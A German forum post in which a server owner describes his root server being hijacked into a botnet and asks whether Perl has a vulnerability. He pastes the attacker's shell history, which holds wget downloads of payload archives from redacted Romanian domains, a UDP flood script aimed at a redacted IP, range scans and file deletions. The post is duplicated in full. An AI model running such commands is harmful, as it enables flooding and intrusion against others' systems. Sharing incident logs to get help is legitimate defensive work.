gerry_coop
24.02.11, 01:11
Hallo und Guten Abend oder eher Guten Morgen,
ich habe einen root Server im Netzwerk der gerade (jetzt nicht mehr) in ein BotNetzwerk gewandert ist.
Ist euch irgendwas bekannt das in Perl eine Sicherheitslücke besteht? Denn irgenjemand hat gerade mein Server bedingt übernommen :mad:
Anbei die Befehle die als root benutzer ausgeführt wurden und somit eine FloodAtacke auf div. IP Adressen auslösen konnte.
************************ SNIP ************************
[WebSite_des_Angrifs_wurde_auskommentiert/udp.tgz
178 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
179 tar xzvf udp.tgz
180 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
181 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
182 wget xxxxxx.ro/a/x.tgz - domain aus Rumänien (Dateien haben Rumänische kommentare)
183 tar xzvf x.tgz
184 cd pma
185 rm -rf bios.txt
186 ./ss 25 -a 194 -i eth0 -s 10
187 wget xxxxxxx.ro/a/e.tgz
188 tar xzvf e.tgz
189 cd sc
190 nano x.pl
191 ./sc 217.160
192 ./sc 87.106
193 ./sc 66.252
194 ./sc 173.203
195 w
196 id
197 ./sc 213.160
198 w
199 ls
200 rm -rf new
201 rm -rf vuln.txt
202 ./sc 85.237
203 id
204 w
205 w
206 id
207 perl x.pl WH1981
208 perl x.pl xxxx.hu - Domain gelöscht
209 perl x.pl xxxx.com - Domain gelöscht
210 w
************************ SNAP ************************
da sind noch mehr Befehle die eingegeben wurden jedoch ist das der einstieg der Attacke.
Ich habe jetzt natürlich bammel damit Online zu gehen - zur Zeit läuft nur FTP und SSH aber irgenwann sollte wieder HTTP laufen.
Falls jemand was weiss währe ich für eine Info Dankbar. :)
Schöne Grüsse
Gerry
ich habe einen root Server im Netzwerk der gerade (jetzt nicht mehr) in ein BotNetzwerk gewandert ist.
Ist euch irgendwas bekannt das in Perl eine Sicherheitslücke besteht? Denn irgenjemand hat gerade mein Server bedingt übernommen :mad:
Anbei die Befehle die als root benutzer ausgeführt wurden und somit eine FloodAtacke auf div. IP Adressen auslösen konnte.
************************ SNIP ************************
[WebSite_des_Angrifs_wurde_auskommentiert/udp.tgz
178 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
179 tar xzvf udp.tgz
180 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
181 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
182 wget xxxxxx.ro/a/x.tgz - domain aus Rumänien (Dateien haben Rumänische kommentare)
183 tar xzvf x.tgz
184 cd pma
185 rm -rf bios.txt
186 ./ss 25 -a 194 -i eth0 -s 10
187 wget xxxxxxx.ro/a/e.tgz
188 tar xzvf e.tgz
189 cd sc
190 nano x.pl
191 ./sc 217.160
192 ./sc 87.106
193 ./sc 66.252
194 ./sc 173.203
195 w
196 id
197 ./sc 213.160
198 w
199 ls
200 rm -rf new
201 rm -rf vuln.txt
202 ./sc 85.237
203 id
204 w
205 w
206 id
207 perl x.pl WH1981
208 perl x.pl xxxx.hu - Domain gelöscht
209 perl x.pl xxxx.com - Domain gelöscht
210 w
************************ SNAP ************************
da sind noch mehr Befehle die eingegeben wurden jedoch ist das der einstieg der Attacke.
Ich habe jetzt natürlich bammel damit Online zu gehen - zur Zeit läuft nur FTP und SSH aber irgenwann sollte wieder HTTP laufen.
Falls jemand was weiss währe ich für eine Info Dankbar. :)
Schöne Grüsse
Gerry